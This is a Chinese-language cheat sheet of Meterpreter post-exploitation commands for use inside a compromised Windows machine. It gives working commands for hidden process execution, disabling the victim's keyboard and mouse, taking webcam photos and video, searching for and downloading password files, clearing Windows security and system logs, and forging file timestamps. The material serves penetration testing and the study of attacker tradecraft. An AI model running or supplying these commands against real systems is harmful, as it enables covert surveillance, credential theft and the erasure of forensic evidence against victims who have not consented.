meterpreter的常用命令

本文主要内容为Metasploit中的Meterpreter模块的常用命令

1.系统命令

1）基本系统命令 sessions #sessions –h 查看帮助 sessions -i <ID值> #进入会话 -k 杀死会话 background #将当前会话放置后台 run #执行已有的模块，输入run后按两下tab，列出已有的脚本 info #查看已有模块信息 getuid # 查看权限 getpid # 获取当前进程的pid sysinfo # 查看目标机系统信息 ps # 查看当前活跃进程 kill <PID值> 杀死进程 idletime #查看目标机闲置时间 reboot / shutdown #重启/关机 shell #进入目标机cmd shell 2）uictl开关键盘/鼠标 uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标 uictl disable mouse #禁用鼠标 uictl disable keyboard #禁用键盘 3）webcam摄像头命令 webcam_list #查看摄像头 webcam_snap #通过摄像头拍照 webcam_stream #通过摄像头开启视频 4）execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe，-H不可见，-i交互 5）migrate进程迁移 getpid # 获取当前进程的pid ps # 查看当前活跃进程 migrate <pid值> #将Meterpreter会话移植到指定pid值进程中 kill <pid值> #杀死进程 6）clearav清除日志 clearav #清除windows中的应用程序日志、系统日志、安全日志

2.文件系统命令

1）基本文件系统命令 getwd 或者pwd # 查看当前工作目录
ls cd search -f pass # 搜索文件 -h查看帮助 cat c:\lltest\lltestpasswd.txt # 查看文件内容 upload /tmp/hack.txt C:\lltest # 上传文件到目标机上 download c:\lltest\lltestpasswd.txt /tmp/ # 下载文件到本机上 edit c:\1.txt #编辑或创建文件 没有的话，会新建文件 rm C:\lltest\hack.txt mkdir lltest2 #只能在当前目录下创建文件夹 rmdir lltest2 #只能删除当前目录下文件夹 getlwd 或者 lpwd #操作***者主机 查看当前目录 lcd /tmp #操作***者主机 切换目录

2）timestomp伪造时间戳 timestomp C:// -h #查看帮助 timestomp -v C://2.txt #查看时间戳 timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt